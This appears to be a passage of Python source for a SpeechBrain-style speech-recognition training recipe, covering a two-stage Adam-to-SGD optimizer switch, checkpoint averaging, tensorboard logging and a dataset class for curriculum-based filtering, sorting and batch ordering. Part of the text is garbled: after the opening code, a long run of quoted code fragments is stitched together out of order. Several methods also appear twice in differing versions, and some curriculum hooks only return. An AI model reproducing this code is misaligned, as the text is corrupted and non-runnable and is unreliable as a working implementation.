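    # loss / 4 on every batch but only calls optimizer.step() when
    # self.step % 4 == 0, so one parameter update aggregates the gradients of
    # four mini-batches (an effective batch size of 4 * batch_size).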
    def check_and_reset_optimizer(self):
        """Reset the optimizer if training enters stage 2."""
        current_epoch = self.hparams.epoch_counter.current
        if not hasattr(self, "switched"):
            self.switched = False
            if isinstance(self.optimizer, torch.optim.SGD):
                self.switched = True

        if self.switched is True:
            return

        if current_epoch > self.hparams.stage_one_epochs:
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            if self.checkpointer is not None:
                self.checkpointer.add_recoverable("optimizer", self.optimizer)

            self.switched = True

    def on_fit_start(self):
        """Initialize the right optimizer on the training start."""
        super().on_fit_start()

        # if the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            # Load the latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:
                # do not reload the weights if training is interrupted right
                # before stage 2
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return
                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )

    def recreate_train_dataset(self, epoch):
        """Gets called at the end of an epoch. This is used to decide whether
        the training dataset needs to be reshuffled/rebuilt at the end of the
        epoch."""
        if self.inter_epoch_dataset_updation:
            # assumption: the curriculum is kept while epoch <= self.sortagrad
            # (or for all epochs when sortagrad == -1)
            if self.sortagrad == -1 or epoch <= self.sortagrad:
                # recreate dataset using the preferred CL approach
                return
        else:
            if self.sortagrad != -1:
                # the number of epochs for which curriculum must be used
                # is defined
                if self.sortagrad < epoch:
                    # recreate dataset using random shuffling
                    return
            else:
                return
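    @staticmethod
    def _demo_two_stage_schedule():
        """Illustrative sketch only (not part of the original recipe): the
        Adam -> SGD switch performed by check_and_reset_optimizer, on a toy
        module with stage one lasting 2 epochs."""
        module = torch.nn.Linear(4, 4)
        stage_one_epochs = 2
        optimizer = torch.optim.Adam(module.parameters(), lr=1e-3)
        for epoch in range(1, 5):
            if epoch > stage_one_epochs and not isinstance(
                optimizer, torch.optim.SGD
            ):
                # same switch as in training: discard the Adam state and
                # continue with plain SGD
                optimizer = torch.optim.SGD(module.parameters(), lr=1e-4)
        return optimizer.__class__.__name__  # -> "SGD"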
otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\":", "and dynamic items (initially deep copied from this, so they have the same", "sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval", "+ [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4.", "created. If a DataLoader is given, it is used directly. valid_set : Dataset,", "for making the train_loader (if train_set is a Dataset, not DataLoader). E.G. batch_size,", "ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This", "self.update_average( loss, avg_valid_loss ) # Debug mode only runs a few batches if", "if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter,", "return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset", "training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched =", "| set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id", "a single model with a single dataset) the only methods that need to", "def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules,", "temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with", "== 0 or ( stage == sb.Stage.TEST ): # Decode token terms to", "{ \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats,", "not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set =", "\"\"\"Forward computations from the waveform batches to the output probabilities.\"\"\" batch = batch.to(self.device)", "these two methods is done. For more complicated use cases, such as multiple", "batches to the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos,", "elif length1 < length2: return -1 else: return 0 def _alphabetic_comparator( self, key1,", "self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST ):", "Dataset is given, a DataLoader is automatically created. If a DataLoader is given,", "self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar is None: progressbar =", "! 
    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        # Add augmentation if specified
        if stage == sb.Stage.TRAIN:
            if hasattr(self.modules, "env_corrupt"):
                wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
                wavs = torch.cat([wavs, wavs_noise], dim=0)
                wav_lens = torch.cat([wav_lens, wav_lens])
                tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        # compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)

        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)

        # forward modules
        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.TRAIN:
            hyps = None
        elif stage == sb.Stage.VALID:
            hyps = None
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, validation uses a beamsearch
                # with limited capacity and no LM to give the user some idea
                # of how the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)

        return p_ctc, p_seq, wav_lens, hyps
jit_module_keys (list of str) List of keys in ``modules`` that", "= None elif stage == sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if", "self.modules.train() # Reset nonfinite count to 0 each epoch self.nonfinite_count = 0 if", "elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type", "info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must", "Beamsearch coupled with a Transformer language model is used on the top of", "key_max_value, key_test) # order entire dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids)", "batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning", "filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example", "return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids", "): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time = time.time() # Only", "input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0", "batch in t: self.step += 1 global_step = completed_steps + self.step loss, loss_ctc,", "data. In order to use the ``fit()`` method, one should sub-class the ``Brain``", "== 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats", "weight, these weight(s) will be used to sort the dataset. ordering_info : str", "iterate a few batches for all datasets, to ensure code runs without crashing.", "= self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None: # Create dataset", "self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data ids,", "directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main(", "try different encoders, decoders, tokens (e.g, characters instead of BPE), training split (e.g,", "order , tie is broken using ``output_length`` in descending order Note: This is", "= self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps", "r\"\"\"Brain class abstracts away the details of data loops. The primary purpose of", "self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights =", "self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must be one of", "set of data to use for validation. If a Dataset is given, a", "< max_weight weights : None, dict Map from data_id to weight, these weight(s)", "changing the parameter files, you can try different encoders, decoders, tokens (e.g, characters", "DataLoader kwargs are all valid. 
progressbar : bool Whether to display the progress", "\"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of", "is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain =", "sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\")", "None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0", "to change the runtime environment, including debug (bool) If ``True``, this will only", "key1, key2 ): \"\"\"Compare two data points based on output length\"\"\" length1 =", "same dynamic items available) \"\"\" # ordering type can be random, sorted #", "True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = []", "= self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval", "into subsets for each device and only saving a checkpoint on the main", "batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) ==", "= {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights(", "# Debug mode only runs a few batches if self.debug and self.step ==", "batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens,", "specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted(", "data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if", "train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"]", "): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None", "debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has its own output", "its own output keys and dynamic items (initially deep copied from this, so", "audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. 
    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch"""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
            # report different epoch stages according to the current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
                optimizer = self.optimizer.__class__.__name__
            else:
                lr = self.hparams.lr_sgd
                steps = -1
                optimizer = self.optimizer.__class__.__name__

            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            # keep the 5 best checkpoints for end-of-training averaging
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)

            # save the averaged checkpoint at the end of the evaluation stage
            # and delete the rest of the intermediate checkpoints;
            # ACC is set to 1.1 so the checkpointer only keeps the averaged
            # checkpoint
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )
    def recreate_train_dataset(self, epoch):
        """Gets called at the end of an epoch to (optionally) rebuild the
        training dataset for curriculum learning."""
        if self.inter_epoch_dataset_updation:
            if self.sortagrad != -1 and self.sortagrad < epoch:
                # the configured number of curriculum epochs has passed:
                # recreate the dataset using random shuffling
                return
            # recreate the dataset using the preferred CL approach
            return
        else:
            if self.sortagrad != -1 and self.sortagrad < epoch:
                # recreate the dataset using random shuffling
                return
            return

    def check_and_reset_optimizer(self):
        """reset the optimizer if training enters stage 2"""
        current_epoch = self.hparams.epoch_counter.current
        if not hasattr(self, "switched"):
            self.switched = False
            if isinstance(self.optimizer, torch.optim.SGD):
                self.switched = True

        if self.switched is True:
            return

        if current_epoch > self.hparams.stage_one_epochs:
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            if self.checkpointer is not None:
                self.checkpointer.add_recoverable("optimizer", self.optimizer)

            self.switched = True
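    # A minimal sketch (assumed numbers, not from the original file) of the
    # two-stage schedule implemented by check_and_reset_optimizer(): with
    # stage_one_epochs = 40, epochs 1..40 use Adam with Noam annealing and
    # epochs 41+ use plain SGD at the fixed lr_sgd rate:
    #
    #   stage_one_epochs = 40                     # hypothetical value
    #   for epoch in range(1, 61):
    #       opt = "Adam+Noam" if epoch <= stage_one_epochs else "SGD"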
    def on_fit_start(self):
        """Initialize the right optimizer on the training start"""
        super().on_fit_start()

        # if the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            # Load the latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:
                # do not reload the weights if training is interrupted
                # right before stage 2
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return

                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )

    def fit(
        self,
        epoch_counter,
        train_set,
        valid_set=None,
        progressbar=None,
        train_loader_kwargs={},
        valid_loader_kwargs={},
    ):
        """Iterate epochs and datasets to improve the objective.

        Relies on the existence of multiple functions that can (or should)
        be overridden. The following methods are used and expected to have a
        certain behavior:

        * ``fit_batch()``
        * ``evaluate_batch()``
        * ``update_average()``

        If the initialization was done with distributed_count > 0 and the
        distributed_backend is ddp, this will generally handle the
        multiprocess logic, like splitting the training data into subsets
        for each device and only saving a checkpoint on the main process.

        Arguments
        ---------
        epoch_counter : iterable
            Each call should return an integer indicating the epoch count.
        train_set : Dataset, DataLoader
            A set of data to use for training. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        valid_set : Dataset, DataLoader
            A set of data to use for validation. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        train_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the train_loader
            (if train_set is a Dataset, not a DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        valid_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the valid_loader
            (if valid_set is a Dataset, not a DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        progressbar : bool
            Whether to display the progress of each epoch in a progressbar.
        """
        if not (
            isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader)
        ):
            train_set = self.make_dataloader(
                train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
            )
        if valid_set is not None and not (
            isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader)
        ):
            valid_set = self.make_dataloader(
                valid_set,
                stage=sb.Stage.VALID,
                ckpt_prefix=None,
                **valid_loader_kwargs,
            )

        self.on_fit_start()
        self.train_set = train_set
        total_steps = len(train_set)

        if progressbar is None:
            progressbar = not self.noprogressbar

        # Iterate epochs
        for epoch in epoch_counter:
            # Training stage
            self.on_stage_start(Stage.TRAIN, epoch)
            self.modules.train()

            # Reset nonfinite count to 0 each epoch
            self.nonfinite_count = 0

            if self.train_sampler is not None and hasattr(
                self.train_sampler, "set_epoch"
            ):
                self.train_sampler.set_epoch(epoch)

            # Time since last intra-epoch checkpoint
            last_ckpt_time = time.time()

            # Only show progressbar if requested and main_process
            enable = progressbar and sb.utils.distributed.if_main_process()
            completed_steps = (epoch - 1) * total_steps
            with tqdm(
                self.train_set,
                initial=self.step,
                dynamic_ncols=True,
                disable=not enable,
            ) as t:
                for batch in t:
                    self.step += 1
                    global_step = completed_steps + self.step
                    loss, loss_ctc, loss_seq = self.fit_batch(batch)
                    self.avg_train_loss = self.update_average(
                        loss, self.avg_train_loss
                    )
                    t.set_postfix(train_loss=self.avg_train_loss)

                    # Write training summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/tot_loss", loss, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/ctc_loss", loss_ctc, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/att_loss", loss_seq, global_step
                    )

                    # Debug mode only runs a few batches
                    if self.debug and self.step == self.debug_batches:
                        break

                    if (
                        self.checkpointer is not None
                        and self.ckpt_interval_minutes > 0
                        and time.time() - last_ckpt_time
                        >= self.ckpt_interval_minutes * 60.0
                    ):
                        run_on_main(self._save_intra_epoch_ckpt)
                        last_ckpt_time = time.time()

            # Run train "on_stage_end" on all processes
            self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
            self.avg_train_loss = 0.0
            self.step = 0

            # Validation stage
            if valid_set is not None:
                self.on_stage_start(Stage.VALID, epoch)
                self.modules.eval()
                avg_valid_loss = 0.0
                with torch.no_grad():
                    for batch in tqdm(
                        valid_set, dynamic_ncols=True, disable=not enable
                    ):
                        self.step += 1
                        loss = self.evaluate_batch(batch, stage=Stage.VALID)
                        avg_valid_loss = self.update_average(
                            loss, avg_valid_loss
                        )

                        # Debug mode only runs a few batches
                        if self.debug and self.step == self.debug_batches:
                            break

                    # Write validation summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Validation/Loss/tot_loss", avg_valid_loss, epoch
                    )
                    self.tensorboard_writer.add_scalar(
                        "Validation/Accuracy/tot_acc",
                        self.acc_metric.summarize(),
                        epoch,
                    )

                    # Only run validation "on_stage_end" on the main process
                    self.step = 0
                    run_on_main(
                        self.on_stage_end,
                        args=[Stage.VALID, avg_valid_loss, epoch],
                    )

            # Debug mode only runs a few epochs
            if self.debug and epoch == self.debug_epochs:
                break
    def on_evaluate_start(self, max_key=None, min_key=None):
        """perform checkpoint averaging if needed"""
        super().on_evaluate_start()

        ckpts = self.checkpointer.find_checkpoints(
            max_key=max_key, min_key=min_key
        )
        ckpt = sb.utils.checkpoints.average_checkpoints(
            ckpts, recoverable_name="model", device=self.device
        )

        self.hparams.model.load_state_dict(ckpt, strict=True)
        self.hparams.model.eval()


def make_dataloader(dataset, stage, ckpt_prefix="dataloader-", **loader_kwargs):
    # The TRAIN stage would normally be handled specially (e.g., with a
    # checkpointable dataloader); here the dataset is simply wrapped.
    dataloader = sb.dataio.dataloader.make_dataloader(dataset, **loader_kwargs)
    return dataloader

class CurriculumOrientedDynamicDataset(DynamicItemDataset):
    """DynamicItemDataset variant that supports curriculum-oriented
    filtering and ordering of the training data."""

    def curriculum_based_filtered_sorted(
        self,
        key_min_value={},
        key_max_value={},
        key_test={},
        min_weight=None,
        max_weight=None,
        weights=None,
        ordering_info="",
        batch_selection="contiguous",
        batch_size=8,
        select_n=None,
    ):
        """Get a filtered and/or sorted version of this dataset, based on
        the specified curriculum; shares static data.

        The reason to implement the filtering and sorting operations in the
        same method is that computing some dynamic items may be expensive,
        and this way the filtering and sorting steps don't need to compute
        the dynamic items twice.

        Arguments
        ---------
        key_min_value : dict
            Map from key (in data or in dynamic items) to limit; will only
            keep data_point if data_point[key] >= limit.
        key_max_value : dict
            Map from key (in data or in dynamic items) to limit; will only
            keep data_point if data_point[key] <= limit.
        key_test : dict
            Map from key (in data or in dynamic items) to func; will only
            keep data_point if bool(func(data_point[key])) == True.
        min_weight : None, int
            If not None, will only keep data_point if
            weight[data_point] > min_weight.
        max_weight : None, int
            If not None, will only keep data_point if
            weight[data_point] < max_weight.
        weights : None, dict
            Map from data_id to weight; these weights will be used to sort
            the dataset.
        ordering_info : str
            Information to create weights based on pre-defined keys (and/or
            methods) and their order. Used only if `weights` is None.
            - Options for keys: `input_length`, `output_length`, `alphabetic`
            - Options for order: `asc`, `desc`
            - Example:
                * "input_length:asc,output_length:desc" - Sort the dataset
                  using ``input_length`` in ascending order; a tie is broken
                  using ``output_length`` in descending order.
        batch_selection : str
            Information on how to order batches.
            - Possible values are `contiguous`, `random`, `sorted`,
              `reverse-sorted`
            - Example:
                * "random" - After the dataset is ordered based on weights,
                  divide the dataset into batches and order these batches
                  randomly to create the final dataset.
        batch_size : int
            Used to divide the dataset into batches (default ``8``). This
            helps in ordering the dataset at batch level.
        select_n : None, int
            If not None, only keep (at most) the first n filtered data
            points. Meant for debugging.

        Returns
        -------
        FilteredSortedDynamicItemDataset
            Shares the static data, but has its own output keys and dynamic
            items (initially deep copied from this dataset, so they have the
            same dynamic items available).
        """
        # ordering type can be random or sorted;
        # keys for ordering info can be input_length, output_length,
        # alphabetic
        dataset_ordering = self._parse_dataset_order(ordering_info)
        ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"

        filtered_data_ids = self._filter_dataset(
            self.data_ids, key_min_value, key_max_value, key_test
        )

        # order the entire dataset
        if ordering_type == "random":
            weights = self._random_shuffled_weights(filtered_data_ids)
        elif ordering_type == "sorted":
            if weights is None:
                # Create dataset weights using the ordering info
                weights = self._custom_sorted_weights(
                    filtered_data_ids, dataset_ordering
                )
        else:
            raise NotImplementedError(
                "Ordering type must be one of random, sorted."
            )

        # order batchwise
        if batch_selection == "contiguous":
            pass
        elif batch_selection == "random":
            weights = self._random_shuffled_batches(weights, batch_size)
        elif batch_selection == "sorted":
            pass
        elif batch_selection == "reverse-sorted":
            weights = self._reverse_sort_batches(weights, batch_size)
        else:
            raise NotImplementedError(
                "Batch selection must be one of contiguous, random, sorted, "
                "reverse-sorted."
            )

        # create the final dataset using the weights
        filtered_sorted_ids = self._weighted_filtered_sorted_ids(
            weights, min_weight, max_weight, select_n
        )
        return FilteredSortedDynamicItemDataset(self, filtered_sorted_ids)
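    # A hedged usage sketch (not from the original file): assuming rows that
    # carry "duration" and "wrd" fields, this orders utterances short to
    # long, breaks ties by transcript length, then shuffles at the batch
    # level so each mini-batch stays homogeneous while batch order is
    # random:
    #
    #   train_data = train_data.curriculum_based_filtered_sorted(
    #       key_max_value={"duration": 30.0},   # drop very long clips
    #       ordering_info="input_length:asc,output_length:desc",
    #       batch_selection="random",
    #       batch_size=8,
    #   )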
    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Returns the list of data ids that fulfill the filtering criteria"""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            """Checks if the data example fulfills the filtering criteria"""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids
    def _weighted_filtered_sorted_ids(
        self, weights, min_value=None, max_value=None, select_n=None, reverse=False
    ):
        """Returns a list of data ids, filtered and sorted using custom
        weights"""

        def weights_filter(weights, min_value, max_value):
            """Keeps only data examples whose weight lies within the range
            (`min_value`, `max_value`)"""
            if min_value is None and max_value is None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            # iterate over a copy: popping while iterating the live dict
            # would raise a RuntimeError
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or (
                    isinstance(max_value, float) and value > max_value
                ):
                    weights.pop(key, None)
            return weights

        filtered_weights = weights_filter(weights, min_value, max_value)
        filtered_ids = []
        for i, data_id in enumerate(filtered_weights.keys()):
            if select_n is not None and len(filtered_ids) == select_n:
                break
            filtered_ids.append((filtered_weights[data_id], i, data_id))
        filtered_sorted_ids = [
            tup[2] for tup in sorted(filtered_ids, reverse=reverse)
        ]
        return filtered_sorted_ids
    def _parse_dataset_order(self, dataset_order):
        """Takes the `ordering_info` string as input and creates a list of
        {key, order} dictionaries out of it"""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == "":
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info

    def _random_shuffle_data_ids(self, data_ids):
        """Shuffle the data_ids in random order"""
        return np.random.permutation(data_ids)

    def _random_shuffled_weights(self, data_ids):
        """Create random weights for data_ids"""
        shuffled_ids = self._random_shuffle_data_ids(data_ids)
        weights = {}
        for index, data_id in enumerate(shuffled_ids):
            weights[data_id] = index
        return weights
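    # Illustrative sketch (assumed, not from the original file) of what
    # `_parse_dataset_order` produces:
    #
    #   self._parse_dataset_order("input_length:asc,output_length:desc")
    #   # -> [{"key": "input_length", "order": "asc"},
    #   #     {"key": "output_length", "order": "desc"}]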
    def _custom_sorted_weights(self, data_ids, dataset_orderings):
        """Create weights for sorting data points using `ordering_info`"""

        def compare(key1, key2):
            """Comparison logic; `ordering_info` can contain multiple keys.

            Return value meaning:
            * 1 - key1 > key2
            * -1 - key1 < key2
            * 0 - key1 = key2
            """
            res = 0
            for ordering in dataset_orderings:
                key = ordering["key"]
                order = 1 if ordering["order"] == "asc" else -1
                if key == "input_length":
                    res = self._input_length_comparator(key1, key2)
                elif key == "output_length":
                    res = self._output_length_comparator(key1, key2)
                elif key == "alphabetic":
                    res = self._alphabetic_comparator(key1, key2)
                res *= order
                # If comparison using `key` returned the data points as
                # equal, continue comparing using the next key; else return
                # the result
                if res == 0:
                    continue
                return res
            return res

        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        weights = {}
        for index, data_id in enumerate(sorted_data_ids):
            weights[data_id] = index
        return weights
    def _random_shuffled_batches(self, weights=None, batch_size=8, reverse=False):
        """Randomly shuffle the dataset at batch level"""
        # place each data id at its weight-determined position
        data_ids = list(weights.keys())
        ordered_data_ids = [None] * len(data_ids)
        for data_id in data_ids:
            ordered_data_ids[weights[data_id]] = data_id

        data_count = len(ordered_data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += ordered_data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise shuffling gone wrong."

        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights=None, batch_size=8):
        """Reverse-sort the dataset at batch level"""
        # place each data id at its weight-determined position
        data_ids = list(weights.keys())
        ordered_data_ids = [None] * len(data_ids)
        for data_id in data_ids:
            ordered_data_ids[weights[data_id]] = data_id

        data_count = len(ordered_data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in reversed(range(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
